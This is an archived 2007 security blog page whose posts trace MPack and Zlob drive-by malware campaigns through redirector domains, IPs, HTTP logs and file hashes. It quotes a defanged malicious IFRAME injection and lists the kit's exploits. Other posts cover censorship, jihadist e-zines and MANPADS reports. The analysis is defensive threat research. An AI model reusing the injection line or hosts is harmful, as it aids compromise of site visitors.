Friday, June 29, 2007

Exploits Serving Domains - Part Two

The saying goes that there's no such thing as free lunch, so let me expand it - there's no such thing as free pr0n, unless you don't count a malware infection as the price. What follows is a demonstration of the Zlob trojan in action that occurs though the usual redirectors, and here's a related article emphasizing on the IFRAME embedded pr0n sites directing traffic to the redirectors :


"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said. Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec Corp., for instance, asked how hackers were able to infect so many sites in such a short time and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly."

Psst - they are hosting the IFRAMES, whether compromised or equal revenue sharing among the parties is a question of another discussion. The attack is quite widespread in the time blogging, check for yourself to get a full listing of all the IFRAME-ed pr0n sites in question. Let's dissect the central hosting locations where all other sites ultimately lead to.

At miss-krista.info - 66.230.171.36 - we have an IFRAME pointing us to todaysfreevideo.com/ad/6811214.html - 81.0.250.239 - where we are offered to download two pr0n videos, todaysfreevideo.com/teens/mr-tp01-2g2s1/1/movie1.php and todaysfreevideo.com/teens/mr-tp01-2g2s1/1/movie2.php, but the actual malware is hosted at an internal page at downloadvax.com - 85.255.118.180 -- and while as usual we get a 403 Forbidden at the main index, within to domain the pr0n surfer gets infected with the Zlob Trojan.

File size
: 70853 bytes
MD5: 009ca25402ee7994977f706b96383af0
SHA1: ab60ecefcf27420a57febd5c8decc5c9f34f0e74
packers: BINARYRES

Obviously, unsafe pr0n surfing leads to malware transmitted diseases, but why exploit serving domains when no vulnerabilities get exploited at these URLs? Mainly because miss-krista.info is part of the exploits hosting domain farm I discussed in part one.

Related posts:

Thursday, June 28, 2007

Post a Crime Online

In exactly the same fashion of Chicago's Crime Database, a community powered site integrating crime reports on Google Maps, Postacrime.com aims to empower police officers with citizen submitted crimes in progress :

"POSTACRIME.COM is a free service for anyone to upload photo or video content of burglary, theft, vandalism, or other criminal acts that have been caught on camera for the purpose of identification by the public. Often times Law Enforcement is unable to apprehend criminals, even if with the best video evidence, because no one is able to identify the criminal caught on camera. POSTACRIME.COM hopes to change that."

If the site reaches YouTube's popularity by disintermediating police forces ongoing intestigative efforts, it could also act as an early warning system for the criminals themselves, especially to change areas of operation. The site is pitching itself as the World's Largest Crime Prevention Network, a bold vision despite that I find it as an informediary categorizing user submitted crimes and hoping the publicity will help identify and criminal and hopefully restore the stolen goods -- you wish. You cannot prevent crime Web 2.0 style at least not in this way, you can aggregate publicly available crime data and present a (heat) map of a certain location based on a specific time for trends analysis.

Wednesday, June 27, 2007

Exploits Serving Domains

More cyber leads from the previous analysis of Mpack embedded dekalab.info with a particular malicious domains farm emphasis as follows. Multiple redirectors, blackhat SEO, XOR-ifying javascript obfuscation and a piece of rootkit installed, pretty much everything's in place as usual. The majority of redirectors are part of an exploit serving domains farm. The whole process starts from trancer.biz :

trancer.biz/sys/index.php
81.95.149.176
HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: cawajanga.biz/ts/in.cgi?oscorp

HTTP/1.1 302 Found
Server: nginx/0.5.17
Date: Tue, 26 Jun 2007 11:51:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: blooded.biz/2103/index.php

Then we get redirected to blooded.biz's obfuscated payload
81.95.149.176 in between loading cawajanga.biz/ts/in.cgi?oscorp and mobi-info.ru where the deobfuscated XOR-ifying javascript leads us to the exact payload location the output of which is in the form of Rootkit.Win32.Agent.fb

File size: 7503 bytes
MD5: 09994afd14b189697a039937f05f440f
SHA1: b9832689aa1272f39959087df41cea13fc283910

Tuesday, June 26, 2007

Early Warning Security Event Systems

Years ago, early warning systems for security events used to be a proprietary service available to a vendor's customers only, or even worse, to the vendors themselves. But with more vendors realizing the marketing potential behind viral marketing, and the need for more transparency on the state of Internet attacks, nowadays such EWS's are either publicly available at a vendor's site, or accessible due to the emerging CERT-ization and aggregation of honeypot data on a coutry level courtesy of the local CERTs themselves. And such is the case with ARAKIS :

"an early warning system operated by CERT Polska. ARAKIS aggregates and correlates data from various sources, including honeypots, darknets, firewalls and antivirus systems in order to detect new threats. The dashboard provides a snapshot of activity on the Internet based on data gathered from a selected group of sensors."

PING sweeps dominate the local threatscape? As always, nobody likes shooting into the dark unless of course they really have to. Several more publicly available early warning systems for security events worth considering are :

ATLAS: Active Threat Level Analysis System
CipherTrust's Real-Time PC Zombie Statistics
WatchGuard's Real-Time Spam Outbreak Monitor
ProjectHoneypot's Spam Harvesting Statistics

as well as several malware outbreaks related early warning systems:

Trend Micro's Virus Map
F-Secure's World Map

PandaSoftware's Virus Map

McAfee's Virus Map

As far as any other non IT security incident on a worldwide scale is concerned, the Global Map of Security and Terrorist Events, maps the "big picture".

The syndication of such publicly available data into a central dashboard is nothing new, but with so many CERTs in Europe the next big milestone to be achived should be to first integrate the data between themselves, share with vendors and vice versa, and then communicate the big picture for industry insiders and outsiders to see. An effort which could really undermine the commercial EW systems, ones whose business model is getting outdated with every day.

The FBI's recent "Operation Bot Roast" not only reminds me of the Wardriving Police who will wardrive and leave you flyers that you're vulnerable, but also that when proactive measures cannot take place post-event ones dominate - "Dude, you're malware-infected and sending spam and phishing emails to yourself!" - not exactly what pragmatic is all about :

"OPERATION BOT ROAST is a national initiative and ongoing investigations have identified over 1 million victim computer IP addresses. The FBI is working with our industry partners, including the CERT Coordination Center at Carnegie Mellon University, to notify the victim owners of the computers."

One thing I've learnt about end users, either educate and evaluate the results, or directly enforce practices leaving them with no other option but to stay secure by default. Most importantly, with major U.S based ISPs sending out spam, thus having the largest proportion of infected customers are publicly known. So instead of giving out anti virus tips, cooperate with ISPs on the concept of filtering outgoing spam messages, and DDoS attacks.

With malicious economies of scale, that is botnet masters automating the entire process of exploiting unpatched PCs, using old-school social engineering attacks taking advantages of opened up "event windows", packing and crypting their malware to exploit the flows in the current signatures-based detection hype - is such an initiative really worth it? Time will show, but what could follow are fake FBI emails telling everyone that they're infected, a little something about the operation itself, and how visiting a certain malware embedded web site will disinfect your PC the way we've seen it happen before.

Monday, June 25, 2007

Cell Phone Stalking

Six year olds install hardware keyloggers at the U.K's Parliament , and now as you can listen to the sweet sixteen's voice in this video, they also know how to take advantage of commercially available cell phone snooping services such as Flexispy for instance :


"Just ask Tim Kuykendall, whose cell phone provided a portal through which a hacker gained access to the most intimate details of his life, recording family members' conversations and snapping pictures of what they were wearing. “We’ve had [times] where I’m having a conversation in my home and I get a voice mail and the conversation’s replayed; received a phone call or even checked my voice mail from a message and while I push 'OK' to listen to [it] I’m hearing a conversation going on in the living room between my daughter and my wife,” he told FOX News."

The successful surveillance however, doesn't make him a hacker, rather a customer of a product, but what's worth considering is how did he manage to infect their cell phones at the first place, namely socially engineering them remotely, or physically infecting the mobile device. Meanwhile, Flexispy is continuing its compatibility efforts among popular Symbian, Symbian 9, Windows Mobile, and BlackBerry devices, aiming to strengthen its position as mobile device activity monitoring solution for some, and cell phone stalking service to others -- two-sided copywriting messages aim to convince those who might be eventually opposed to the idea.

Related posts:

Friday, June 22, 2007

The MPack Kit Attack on Video

Video demonstration of MPack courtesy of Symantec, goes through various infected sites and showcases the consequences of visiting them : "This video demonstrates how a system is compromised by a malicious IFRAME and how the MPack gang has accomplished this on literally thousands of websites (mostly Italian) through usage of an IFRAME manager tool."



Meanwhile, dekalab.info is yet another malicious URL exploiting MDAC ActiveX code execution (CVE-2006-0003) for you to analyze, among the many already patched vulnerabilities used in the latest version of Mpack. The question remains - how many zero days are currently exploited in the wild through the MPack kit? The "best" is yet to come, paying attention to the periodical new supply of loaders -- 58.65.239.180 got last updated Date: Thu, 21 Jun 2007 22:02:08 GMT -- indicates commitment.


Input URL: dekalab.info
Responding IP: 203.121.78.127
203.121.64.0 - 203.121.127.255
TIME Telecommunications Sdn Bhd

Interesting enough, the original source of the IFRAME attack 58.65.239.180 remains active, still acting as a redirector to 64.62.137.149/~edit/ which is again an exploit embedded page generated with the MPack kit :

- 58.65.239.180
58.65.232.0 - 58.65.239.255
HostFresh

- alpha.nyy-web.com (64.62.137.149)
64.62.128.0 - 64.62.255.255
Hurricane Electric

Evasive malware embedded attacks are aiming the improve their chances of not getting detected. If your browser cannot be exploited all you will see at these IPs/URLs is a :[ sign, the rest is the obfuscated javascript attack you can see in the screenshot. Here's the deobfuscated reality as well. Periodically monitoring these IPs will result in a great deal of undetected malware variants. AVs detecting the current payload

eTrust-Vet - Win32/Chepvil!generic

File size
: 7283 bytes
MD5: ae4e60d99ec198c805abdf29e735f1a7
SHA1: b0d1b68460683d98302636ab16a0eaa4b579397d

Aruba.it's comments on the case as well. Now, let's move on, shall we?

A Blacklist of Chinese Spammers

With China no longer feeling pround of its position in the top 3 main sources of spam on a worldwide basis, the coutry is going a step beyond the bureaucratic measure to fight spam by licensing email servers undertaken back in April, 2006, and has recently launched a blacklist of Chinese spammers :


"The comprehensive anti-spam processing platform (http://www.iscbl.anti-spam.cn/) will post a regularly updated blacklist of spam servers, allowing telecom operators and mail service providers to access the information. Over 100,000 IP addresses have been blacklisted thanks to public reports, said Zhao Zhiguo, vice-director of the telecommunications department of the Ministry of Information Industry. A "white list" of mail service providers will also be posted on the website, boosting the development of lawful mail service providers, such as the country's big players Sina, 163 and Sohu. ISC Secretary-General Huang Chengqing said the website will gradually open to the public and businesses to accelerate anti-spam efforts domestically and internationally."

And despite that major blacklist providers have been providing such lists for years, China's inside-towards-outside approach is a great example on the most effective, yet not so popular approach of dedicating more efforts into filtering outgoing spam, compared to the current approach of filtering incoming one. Only if responsibility is forwarded to the ISPs doing nothing to filter outgoing spam -- who will later on offer you a free spam protection to differentiate their USP -- we can start seeing results. 7h3 r3$t i$ a cat and mouse game, and overall decline in the confidence and reliability of email communications.

World spamming map courtesy of Postini.

Thursday, June 21, 2007

A List of Terrorists' Blogs

Following previous posts "Full List of Hezbollah's Internet Sites", and "Hezbollah's DNS Service Providers from 1998 to 2006", here's a list of terrorist/jihadists related blogs hosted at Wordpress.com, spreading propaganda, violent videos, and yes, glorifying terrorism. The raw content is fascinating, and the main idea behind this multilingual propaganda translations are to wage a "battle of ideas".

The list and associated analyses :


Keywords density :
you 531
allah 493
their 381
they 312
them 306
which 278
we 269
his 266
not 253
have 251


Keywords density :
die 389
der 374
von 215
ist 187
sie 175
den 163
zu 161
das 143
dass 136
es 129


Keywords density:
he 33
his 25
we 25
they 23
allah 23
news 23
shaykh 17
people 16
wa 16
fighting 14


Keywords density:
he 186
his 147
not 124
allah 122
him 106
they 104
them 82
one 73
you 69
their 66

The following are no longer updated :

Here are some more worth going through or crawling :

As always these are just the tip of the iceberg, but yet another clear indication of the digitalization of jihad.

MANPADS and Terrorism

Can terrorist entities easily obtain shoulder-launched surface-to-air missiles and how are they achieving it? How is sensitive military technology leaking into the hands of those supposedly not in a position to take down modern aircraft? Did the overall shift of discussion aiming to shred more light into the guerilla type of asymmetric dominance terrorists have, excluded the real discussion of how MANPADS and night vision equipped fighters take lifes on a daily basis in the very sense of conventional warfare?

FAS analyst Matt Schroeder tries to answer these questions in a recently released publication entitled "Global efforts to control MANPADS" :

"Preventing the acquisition and use of man-portable air defence systems (MANPADS) by terrorists and rebel groups has been a matter of concern since the early 1970s. However, despite the persistence of the threat MANPADS pose to aviation, it was the 2002 al-Qaeda attack on an Israeli civilian aircraft flying out of Mombassa, Kenya, that focused world attention on the issue. This introductory section continues by providing some basic information on the development and main types of MANPADS and their capabilities. Section II of this appendix gives an overview of the main threats posed by the weapon. Section III reviews efforts to control the weapon prior to the Mombassa attack, and section IV examines contemporary counter-MANPADS efforts. Section V presents some concluding observations and recommendations for further action."

Export controls, stockpile destruction, physical security and stockpile management practices, buy-back programmes, and active defence measures: airports and airliners are among the key topics discussed. Here's a related post on the topic "Video Shows Somali Insurgent with Sophisticated SA-18 Missile" as well.

Images courtesy of a MANPADS related article in the second issue of the Technical Mujahid E-zine.

Wednesday, June 20, 2007

Massive Embedded Web Attack in Italy

The Web is abuzz with news stories regarding the MPACK web exploitation kit installed on over 10,000 mostly Italian based sites, and in the spirit of previous analyses of malicious URLs here's an overview of the strategy of the attack, the outcome, and IPs in quesiton, thus the ones that should get blacklisted or CYBERINT applied for further juicy details on the severity of the attack.

The strategy of the attack
Picture yourself in the position of a malicious attacker wanting to infect the highest number of PCs possible in the shortest timeframe. How would you go for infecting the highest possible proportion of internet surfers using outdated software, ones still living in the "don't open .exe attachments" self-vigilance world? You'll either figure out a way to exploit vulnerabilities within a huge number of web sites and automatically embed the malicious payload, or breach a shared hosting provider and infect all of its customer, thus potentially infecting all of their future visitors. Which is exactly what happened in the most recent case of what's turning into a massive epidemic of MPACK embedded sites.

The outcome of the attack
- Over 10,000 sites affected according to WebSense
- hundreds of thousands PCs currently infected according to obtained MPACK statistics
- the majority of infected PCs are located in Italy given the breach of the shared hosting provider Aruba

Dissecting the attack
It all started when popular Italian sites had the following IFRAME embedded within their front pages :

name='StatPage' src='hllp://58.65.239.180/' width=5 height=5

The entire attack is currently orbiting around the following IPs :

58.65.239.180
64.38.33.13
194.146.207.129
194.146.207.18
194.146.207.23
81.177.8.30
203.121.71.183
81.95.148.42
81.95.149.114

Input URL: 58.65.239.180
Effective URL: hllp://truman.dnspathing.com/suspended.page/
Responding IP: 64.38.33.10
HTTP/1.1 302 Moved TemporarilyServer: nginx/0.5.17
Date: Tue, 19 Jun 2007 22:56:01 GMT
Content-Type: text/html
Content-Length: 161
Connection: keep-alive
Location: hllp://64.38.33.13/~ftpcom/

More coverage :
ISC, Symantec, WebSense, TrendMicro, Finjan -- great to see they came across my analysis of ms-counter.com as well -- PandaLabs.

UPDATE:

MPACK's Builder Screenshot courtesy of Symantec. Meanwhile, here are the exploits available in the latest 0.90 release of the web exploitation kit :

- modified MS06-014
- MS06-006 Firefox 1.5.x Opera 7.x
- 0day Win2000 (ms06-044)
- XML overflow under XP2k3
- WebViewFolderIcon overflow
- WinZip ActiveX overflow
- QuickTime overflow
- ANI overflow

The majority of news articles I came across to are emphasizing that the kit is available for sale at $1000. True, but only if you're purchasing it from the original source, namely, the kit has been a commodity for quite a while, with different propositions modifying the source code and selling it for much less, even bargaining with it in case someone's interested in the associated in the related underground services offered.

Even more ironic in the case of this particular attack is that while performing the cyber forensics part, I came across another malicious site farm hosting dialers courtesy of CARPEDIEM. And while the IFRAME part of the massive embedded Italy based attack was gone in the time of checking the dialers, even previous instances of CoolWebSearch were still in place. The second malicious campaign is run via sv2.biz, campaign id = 15682, all the p0rn sites at 193.110.146.69 which is hosting all the dialers-embedded sites in question. From another perspective the benefits of infecting a web sites farm run on a single IP with probably hundreds of thousands of visitors in the shortest timeframe possible, has a major flaw, blocking 192.110.146.69 aka CARPEDIEM, which is a matter of fact listed by Google as a harmful site will temporarily mitigate the threat.

Initiating traceback of a site that's participating in two malicious campaigns :

1 -> hllp://www.dojinshi.biz/dojin/
Responding IP: 62.149.130.37

2 -> Sites spreading the dialers within :

hllp://www.analream.com/index.html?id=15682
Responding IP: 193.110.146.69

Dynamics of infection :

basically, the host name is identical with the distributed .exe's

My_Param['rf'] = "AnalReamV2KTU";
My_Param['id_produit'] = 550;
My_Param['id_site'] = 995;
My_Param['synergie'] = 'h';
My_Param['color'] = 'fire';
My_Param['name_kit'] = "AnalReam.exe"

Here's the entire campaign list :

asian-booty.com/?id=15682
bukkakenation.com/us/index.html?id=15682
devilteen.com/?id=15682
fetishcell.com/?id=15682
flowerbabes.com/index.html?id=15682
mrstrollop.co.uk/index.html?id=15682
sexyharem.com/?id=15682
sorority-house.com/index.html?id=15682
sublimanal.com/us/index.html?id=15682
tottyunited.co.uk/index.html?id=15682
trashedtramps.com/?id=15682
gangbangdemolition.com/us/?id=15682
gothnymphs.com/?id=15682
kinkythighs.com/?id=15682
porndivinity.com/?id=15682
newhentai.com/us/index.html?&id=15682
kumtomi.com/index.html?&id=15682

Situational awareness at its best is what truly matter at the bottom line.

Monday, June 18, 2007

Israeli Reconnaissance Satellite C&C - Video

Catchy demo of a C&C center in Israel, via Cryptome. A violation of OPSEC? Not necessarily given that some of the synchonized displays are blurred, but the main purpose behind the clip is to communicate that - "yes our IMINT is powerful enough". Some of the most recent satellite reconnaissance developments are a great example of the utopian tracking of non-existing terrorists' physical assets, such as boats in this case, even white horses in Afghanistan.

"The ocean-surveillance satellites, part of the National Ocean Surveillance System (NOSS), will track possible terrorist activities at sea. The two satellites will fly in a regimented formation within their elliptical orbits above the Earth so that they will be able to precisely determine the positions of ocean-going vessels at different times. This data will be combined with data from 18 other NRO satellites orbiting the Earth, which are spaced apart at six or seven different sections above the Earth’s surface."

And while the U.S is investing in a satellite reconnaissance without any "fog of war", an effort that's enviable, but highly innefective when it comes to fighting terrorism, Japan which is still heavily relying on U.S sharing of reconnaisance satellites' data is facing criticism for not registering some of its spy satellites, a common practice among many other nations :

"Tokyo has been operating spy satellites for four years that have not been registered with the United Nations, despite having signed an international treaty that requires it to report them. The Convention on Registration of Objects launched into Outer Space, adopted in 1974 and proclaimed in 1976, required signatories to identify the artificial satellites and other objects they put in space. Japan signed that treaty in 1983. Treaty violations are not subject to punishment."

precisely the type of possible pre-launch information leakage I pointed out in a previous post on stealth satellites :

"You can't hijack, intercept or hide from what you don't see or don't know it's there, and stealthy satellites are going to get even more attention in the ongoing weaponization of space and the emerging space warfare arms race. Here's a huge compilation of articles and news items related to the development of stealthy satellites."

A pre-launch leak in today's OSINT world is the worst enemy of the concept of stealth satellites. Here's an in-depth assessment of China's anti-satellite programs worth going through as well.

Related posts:
Satellite Imagery of Secret or Sensitive Locations
U.K's Latest Military Satellite System
The History and Future of U.S. Military Satellite Communication Systems
China Targeting U.S Satellite - Laser Ranging or Demonstration of Power?
Open Source North Korean IMINT Reloaded
Iran Bans Purchase of Foreign Satellite Data

Tuesday, June 12, 2007

DIY Malware Droppers in the Wild

The revenge of the script kiddies, or the master minds releasing DIY tools to let 'em generate enough noise as I've pointed out in my future trends of malware paper? Further expanding the Malicious Wild West series, here are two more recently released DIY malware droppers. The detection rate for the generated dropper of the first one is disturbing given it's not even crypted :

AVG - 06.12.2007 - Downloader.VB.KK
NOD32v2 - 06.12.2007 - probably unknown NewHeur_PE virus
Panda - 06.12.2007 - Suspicious file

No AV detects the packer itself!

File size: 311296 bytes
MD5: 1944378cba81bcd894d43d71dc5fccb5
SHA1: 920505f2124e8a477ab26a28f81a779d717882be

The second one has a much higher detection rate of both the packer and the dropper :

File size: 19001 bytes
MD5: abad61857c4b79773326496dec11929b
SHA1: 5c74c3572febf7f468b41d9bdc5cbc19eb2348b5

PandaLabs has recently conducted a study on the increasing use of packers and cryptors by malware authors worth mentioning :

"There are many different packers. According to the PandaLabs study, UPX is the most common and is used in 15 percent of the malware detected. PECompact and PE, are used in 10 percent of cases. However, according to PandaLabs, there are more than 500 types of packers that could be used by cyber-crooks. “In essence it is a stealth technique. The increasing use of these programs highlights how keen Internet criminals are for their creations to go undetected,” explains Luis Corrons, technical director of PandaLabs."

You may also be interested in finding out how popular anti virus vendors perform agains known, but crypted malware.

Related posts:
A Malware Cryptor
A Malware Cryptor 2
A Malware Loader

Homosexual Warfare

Applause for the non-lethal weapons R&D, but a Gay Bomb using aphrodisiacs to provoke sexual behaviour on the field courtesy of the Pentagon, is far more creative than a vomit beam for instance :

"In one sentence of the document it was suggested that a strong aphrodisiac could be dropped on enemy troops, ideally one which would also cause "homosexual behaviour". The aphrodisiac weapon was described as "distasteful but completely non-lethal". In its "New Discoveries Needed" section, the document implicitly acknowledges that no such chemicals are actually known."

Just imagine the situation when a century later, a futuristic History Channel displays holograms of such warfare activities. More info on the Gay Bomb, as well as video of soldiers on LSD -- exceptional warriors win their battles without waging wars.

Censoring Flickr in China

Since I've been discussing China's Internet censorship practices, and I've been doing it pretty much since I've started blogging, this is the most recent example of how what's thought to be the most robust and sophisticated censorship system in world is a useless technological solution if not implemented "properly". The news of the government censoring a very popular site will spread faster, but instead of applying the predefined subversive content detection practice and allow anything else, they're mocking their overhyped censorship system by blocking the entire site instead of either removing the content in question or blocking access to the specific Flickr set. Futile attempt? For sure, but far more gentle approach of censorship compared to the current one.

Various news sources reported that China's censoring the entire Flickr. As you can see the greatfirewallofchina.org test confirms the block, but it also confirms that Flickr.com itself is not censored but any other content within. How come? The idea is that the user user is left with the impression that it's a technical glitch at Flickr.com compared to receiving a censorship warning or even a 404 when accessing the main page. Logging in Flickr is possible -- verified though a Beijing based proxy manually -- uploading is also possible, but not content can be seen.

Flickr = a Yahoo! media company with which the Chinese government has been keeping close ties in the past so that jailed journalists started filling lawsuits against Yahoo. Various bloggers speculated that China banned the entire site due to the leak of protestor's photos on it, and taking into consideration China's ongoing censorship of mobile communications such as SMS messages which I covered in a previous post, you may notice that the first image of the received sms for the time and place of the protest is censored by the photographer herself, especially the time of receivement. The protest is also on YouTube, so would YouTube be logically next to get blocked? I doubt so as basically, the protest will position itself as an even more high priority issue for the Chinese government. The censorship trade-off, should you censor it and add more exclusiveness to it, or ignore and act like it's nothing serious? Undermine censorship by spreading the censored item further.

Even more interesting is the fact that couple of months ago, Google's shareholders were about to wage a proxy battle in order for them to convince top management in the long-term effects of censorship. Google convinced them that the revenues streaming from China with its near the top Internet population are more important and so they agreed. Obviously, Yahoo's shareholders are too, not keen of the fact that their investments are driving the oppression of Chinese citizens, and have recently proposed a similar resolution :

"Amnesty International has today (11 June) expressed its support for two shareholder resolutions up for vote at tomorrow's Yahoo! annual meeting in California, one calling on the company to oppose internet repression in countries such as China, and one requesting the creation of a corporate Board Committee on Human Rights."

New media companies are helpless and obliged under Chinese law to censor if they don't want to lose the option to do business in (Soviet) China, therefore a nation-2-nation actions must be taken especially from the world's major evalgelists of a free society and democracy. The rest is a twisted reality - a Tiananmen Square image search outside China, and a Tiananmen Square image search in China, everything's "in order".

Thursday, June 07, 2007

An Analysis of the Technical Mujahid - Issue Two

Good afternoon everyone, shall we enjoy some fried cyber jihadists for lunch? I'd say let's go for it. After analyzing issue one of the Technical Mujahid couple of months ago, the post continues to be among the most popular ones at this blog, and best of all - I've virtually met with people whose knowledge intimacy I'd never ruin by physically meeting with them. In a globalized world, OSINT is your early warning system and a tool for establishing social responsibility as a citizen of world, and I'm still sticking to my old saying that an OSINT conducted - a tax payer's buck saved somewhere.

During March, 2007, the Al Fajr Information Center released the second issue of the Technical Mujahid E-zine (72 pages), a definite proof of their commitment towards educating the prone to brainwashing and radicalization wannabe jihadists. What has improved? Have the topics shifted from the general IT ones to start covering conventional weaponry discussions? Disturbingly yes. Whereas the topics still largely remain IT related, much more PSYOPS and discussion on weapons systems such as MANPADS- is included in the second issue. The myth of terrorists and jihadists using steganography is "thankfully" coming out of the dark despite how uncomfortable you may feel about it, from a strategic point of view, the low lifes are putting more efforts into educating the average jihadist on how to generate noise, so that the real conversation can continue with wannabe jihadists getting caught, and the true master minds remaining safe.
Case in point - the first issue of the magazine was covered by the several sources who seem to be aware of the forums where the real discussion and announcements are going, but the release of the second issue wasn't that well covered in comparison to their previous coverages. But how come? Is someone interested in getting a higher proportion of the upcoming departamental budget allocation with stories like we need petabytes of disk space and CPU on demand to analyze the ongoing conversations, or is the average citizen feeling more secure not knowing how aware both cyber and real life jihadists are? A picture is sometimes worth a thousand fears. Let's discuss the second issue of the Technical Mujahid by starting with the key summary points :

Key summary points :
- The second issue of the magazine is diversifying its content to include conventional weaponry articles, especially the nasty MANPADS
- Propaganda is largely increasing, thanks to automated translation software and keywords density analysis
- With articles such as the ABC of running and operating a Jihadist site online, the authors of the magazine are aiming to generate even more noise
- There's a very experienced team of multimedia/creative designers applying professional layouts to the magazine and the articles

01. Article One - An Overview of Steganography and Covert Communications

Article one is continuation from the discussion opened in the first issue on the basics of steganography and encryption. Rich on visual material as always, it covers a surprising number of steganographic techniques starting from watermarking, and also commenting on the process of steganalysis and how degrading the quality of an image let's say, is a major trade-off compared to encryption for instance. The article also includes a comparison of colors histogram of an original image and a steganographic one to showcase the trade-off. What makes an impression is the evolving editorial and DIY tutorials with definitions of technical terms at the end of each article and their Arabic translation..

Key terms from article one :

Steganography (Steganos graphy); Steganalysis; Morse Code; Digital Signal and Image Processing; Watermarking; LSB (Least Significant Bit); MSB (Most Significant Bit); Histogram (Frequency distribution of RGB); One Way Encryption; Discrete Cosine Transform (Coefficients); Enhanced LSB Layers Analysis.

Moreover, an exampe is given where Islamic military communications in Iraq are hidden in a 100x50 pixel picture. Feeling uncomfortable with the idea of jihadists using steganography for communications? So do I, but keeping it realistic instead of denying the reality is even worse than actually admitting it. Something else is important to understand as well, and that's to overall lack of situational awareness of the average citizen in any contrying, still living in the stereotype of bunch of folks making plans on the sand in a distant cave somewhere in the mountains. Your desire to remain what you are is what limits you.

It also worth discussing why are they including English-to-Arabic translations of technical terms, and I think the main goal is to provoke readers to start searching the Arabic web for related articles, perhaps a good moment to break the stereotype a mention that online jihadi communities is where visitors convert to talkers, and later on doers.

02. Article Two - Creating a Jihadist's Site for Newbies

In order for jihadists to generate more noise and build a loyal army of believers, the authors have taken the time and effort to explain the basics of web design, web hosting, and various other issues related to building a jihadists site from scratch. In times of "war on ideologies", the bigger the community, the higher chance for possible recruitment.

03. Article Three - An Overview of Short Range Shoulder-Fired Missiles

From ITsecurity to conventional weaponry articles, the shift is very interesting one, especially the in-depth knowledge on various systems and the countermeasures aircraft have against MANPADS. What's worth mentioning is the PSYOPS motive of jihadist's sandal on the top of a scrap from an obviously taken down helicopter. The articles concludes with detailed technical specifications of MANpads and by highlighting the dominance of the Russian IGLA system.

Key terms from article three :

Infrared (wavelength greater than 0.7 micron); Ultraviolet (UV: wavelength less than 0.4 micron); Infrared seeker head; IFF (Identification Friend or Foe) antenna; Digital signal processing (DSP); Counter-Countermeasures(CCM); Directed infrared countermeasures [DIRCM]; Sensor- Mercury Cadmium Telluride (HgCdTe) 1- 24mm; Sensor- Indium Antimonide (InSb) 1-5.5mm

04. Article Four - Basics and Importance of Encryption
Even wondered how Alice and Bob talk exchange keys in Arabic? This article explains in detail the basics and importance of encryption, and compared to issue one of the technical mujahid which was recommending PGP, the author is now recommending the Mujahideen Secrets encryption tool.

05. Article Five - Basics of Video Recording and Subtitling Clips
Wonder how did the whole jihadist multimedia revolution start? As it seems, there's a team of "reporters" attached to militant groups to take recordings of the battles and later one include propaganda background music and subtitle them to acheive an even more influential effect on their audience.

Dear wannabe jihadists - if your definition of existence consists in your futile attempt to achieve a knowledge-driven jihadist community in the form of generating noise with armies of religiously brainwashed soldiers, you face extinction it's that very simple.

Wednesday, June 06, 2007

Security Cartoons

Despite that the main goal of the initiative is to build better awareness among the average Internet user through security cartoons, it's also very entertaining for someone professionally in the field. The original press release :

"The cartoons we have developed obviously are not a textbook approach, not made for professional journals or geared to an audience of professional researchers," said Srikwan, who is the graphic designer of www.SecurityCartoon.com. "We wanted this to be accessible to anyone who uses the Internet -- general consumers, teenagers, teachers and anybody who banks or shops online. That's why the cartoon format is perfect -- everybody can relate to it. The cartoons cover online security issues such as phishing, pharming, malware, spoofing and password protection. But as opposed to most other educational efforts relating to these topics, the cartoons do not only teach its readers what to do and not to do, but why, too."

Is building security awareness in the age of malicious economies of scale worth the investment in terms of outsourcing the program details to an experienced vendor? You bet, and what I especially like about the cartoons collection is its vendor-independent position, namely it's not promoting the idea of the product concept myopia and product as the solution to the threat, but vigilance and maintaining a decent situational awareness while online. The rest is up to a vendor's marketing and sales department trying to hopefully get more customers and prove their solution outperforms the rest of the vendors, compared to a profit-margin centered vendor, trying to squeeze out the juice from a commoditized product or a solution but lacking any major differentiation points.

Here are two more great collections of security cartoons as well.

CIA's "Upcoming" Black Ops Against Iran

Recent articles pointing out on a U.S President Bush's clearance for CIA black operations against Iran, make it sound like it's something the CIA haven't been doing for decades already. Here's an example of a spy thriller in real life on how the CIA helped U.S embassy workers escape the country unharmed during Iran's revolution by using a fake sci-fi movie production as an excuse :

"He was stuck. For about a week, no one in Washington or Ottawa could invent a reason for anyone to be in Tehran. Then Mendez hit upon an unusual but strangely credible plan: He'd become Kevin Costa Harkins, an Irish film producer leading his preproduction crew through Iran to do some location scouting for a big-budget Hollywood epic. Mendez had contacts in Hollywood from past collaborations. (After all, they were in the same business of creating false realities.) And it wouldn't be surprising, Mendez thought, that a handful of eccentrics from Tinseltown might be oblivious to the political situation in revolutionary Iran. The Iranian government, incredibly, was trying to encourage international business in the country. They needed the hard currency, and a film production could mean millions of US dollars."

Today's active black ops doctrine isn't hapenning without Iran taking notice of course :

"Other Iranian Americans also have been prohibited from leaving Iran in recent months, including Parnaz Azima, a journalist for the U.S.-funded Radio Farda; Ali Shakeri, a founding board member of the Center for Citizen Peacebuilding at the University of California, Irvine; and Kian Tajbakhsh, consultant working for George Soros' Open Society Institute."

Realizing the U.S's inability to wage conventional war on yet another front -- from a PR point of view not lack of capacity -- the CIA is logically putting more efforts into undermining a religious regime where it hurts most - Iran's overall isolation from the world's economic markets and a fact with which no one from the international community is feeling comfortable with, namely, Iran's continuing efforts to supply the enemies -- Hezbollah -- of its enemies -- the U.S -- with technology and know how that was supposedly hard to acquire.

